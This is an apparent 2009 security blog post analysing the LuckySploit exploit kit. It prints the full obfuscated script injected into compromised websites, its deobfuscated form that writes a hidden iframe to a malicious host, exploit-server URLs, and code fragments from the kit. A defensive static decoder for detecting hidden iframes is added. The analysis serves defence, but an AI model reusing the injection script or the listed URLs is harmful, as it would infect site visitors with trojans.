Thursday, April 9, 2009

Black Hat SEO - RBN Hacks, p.2

The silent threat: Black Hat SEO - Cyber Crime Toolkit Exposed

Welcome to LuckySploit:) ITS TOASTED

READ THIS page if you need more information


WARNING: All sites listed on this page are dangerous (live URLs with exploits) which lead
to trojans being automatically installed on your computer.
Do NOT visit them unless you know what you are doing.
(only the links are safe)


A nice article provided by Finjan about the LuckySploit toolkit, one of the
latest script-kiddie toolkits used by cyber criminals these days, can be found
by following this link: LuckySploit Toolkit Exposed

Using a well-known technique such as "code obfuscation", most often used to
hide its real intention (and sometimes randomly generated), here is one of the
numerous malicious scripts found on several compromised websites.

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>
<script>
// helper: parses a string as a base-16 (hex) number
function c102916999516l4963660743084(l4963660743855){
var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));}
// decoder: walks the hex string two characters at a time and turns each pair into one character
function l4963660744fc7(l4963660745797){
function l4963660746f0b(){return 2;}
var l4963660745f69='';
l4963660747eab=String.fromCharCode;
for(l4963660746738=0;l4963660746738<l4963660745797.length;
l4963660746738+=l4963660746f0b()){
l4963660745f69+=(l4963660747eab(c102916999516l4963660743084(
l4963660745797.substr(l4963660746738,l4963660746f0b()))));}
return l4963660745f69;}
var x60='';
var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60
+'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x60
+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+
'5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+
x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+
'352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+
'3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+
'3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+
'125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+
x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+
'6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+
'3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+
x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+
'352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+
x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+
x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+
x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+
x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+
'32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+
x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+
'3925373425373925336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+
x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+
'325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+
'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+
x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+
'3726'+x60+'970743E';alert(l4963660744fc7(l4963660748680));
</script>

The deobfuscated result is:

<script>
// myia is still undefined on the first run (var hoisting), so the guard passes once and the hidden IFRAME is written
if(!myia){document.write(unescape('%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20'
+'%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f'
+'%63%68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%34%39%20'
+'%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a'
+'%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}
var myia=true;
</script>

which then loads the IFRAME:

<iframe name=c10 src='hxxp://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'></iframe>
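As an added example (not code from the original post), here is a static decoder that peels both layers of the script above without executing it: it gathers the hex fragments the sample splits with the empty x60 variable, applies the same parseInt(…,16)/String.fromCharCode transform, decodes the unescape() layer, and flags hidden IFRAMEs. The sample input is constructed in the same shape as the post's script; the host example.invalid and all function names are assumptions.

```javascript
// Added example (not from the original post): statically peel the two obfuscation
// layers shown above without executing the script. Sample input is constructed.

// Layer 1: the sample splits a hex string into quoted fragments joined by an empty
// variable (var x60='') to defeat signature matching; collect and rejoin them.
function extractHexFragments(jsSource) {
  const out = [];
  const re = /'([0-9A-Fa-f]*)'/g;
  let m;
  while ((m = re.exec(jsSource)) !== null) if (m[1]) out.push(m[1]);
  return out.join('');
}
// Same transform as the sample's decoder: parseInt(pair, 16) -> String.fromCharCode.
function decodeHexPairs(hex) {
  let s = '';
  for (let i = 0; i + 1 < hex.length; i += 2) s += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  return s;
}
// Layer 2: document.write(unescape('%3c...')); decode the %xx escapes ourselves.
function decodePercentEscapes(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}
// Report every iframe and whether it is hidden the way the post shows (visibility:hidden or 1x1).
function findIframes(html) {
  const found = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const a = m[1];
    const attr = (n) => (a.match(new RegExp('\\b' + n + "=['\"]?([^'\"\\s>]+)", 'i')) || [])[1];
    const tiny = Number(attr('width')) <= 1 && Number(attr('height')) <= 1;
    found.push({ src: attr('src') || '', hidden: /visibility\s*:\s*hidden/i.test(a) || tiny });
  }
  return found;
}
function analyzeObfuscatedScript(jsSource) {
  const stage1 = decodeHexPairs(extractHexFragments(jsSource));
  return { stage1, iframes: findIframes(decodePercentEscapes(stage1)) };
}
// Constructed sample in the same shape as the post's script (example.invalid is a
// placeholder host): hex pairs split with x60, wrapping a percent-escaped hidden iframe.
function toHexPairs(s) {
  return Array.from(s, (c) => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}
const INNER = "<script>if(!myia){document.write(unescape('%3c%69%66%72%61%6d%65%20"
  + "src=%27http://example.invalid/check.html%27 width=1 height=1 style=%27visibility:hidden%27%3e'))"
  + ";}var myia=true;</script>";
const SAMPLE = "var x60='';var h='" + toHexPairs(INNER).match(/.{1,6}/g).join("'+x60+'") + "';alert(d(h));";
console.log(analyzeObfuscatedScript(SAMPLE).iframes);
```

Run against the real sample, extractHexFragments also picks up the decoder's own empty string literals, which is why empty matches are skipped.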

Note that a Google search for "if(!myia)" iframe shows that the script used in this second
redirection is the subject of a lot of forum chatter, reporting injected IFRAMEs pointing to
different IPs and other hacked-site problems.


An example of a site on the same IP:

gogo2me.net resolves to 94.247.2.157 [hs.2-157.zlkon.lv]

which then loads an IFRAME (with LuckySploit):

hxxp://94.247.2.157/.dif/go.php?sid=1
hxxp://94.247.2.157/.lck/?t=3
hxxp://94.247.2.157/.lck/?t=6
http://94.247.2.157/.lck/?90f6ff8e287ae123...
http://94.247.2.157/.lck/?75c4a0ecf4a4836...

Wepawet Analysis

A ThreatExpert analysis also indicates a relationship with these viruses/malware:

a Zlob variant (Trojan-Spy.Win32.Zbot), a keylogger trojan (Trojan-Spy.Zbot.YETH) and a
TDSS (alias Alureon) variant, Win32.Fasec [Ikarus]


And here I just show you the line :) Also note the use of the RSA algorithm (screenshot)

nextkey = '';
k = '';
attack_level = 0;
try {
f = 'Welcome to LuckySploit:) \n ITS TOASTED';
} catch (e){
}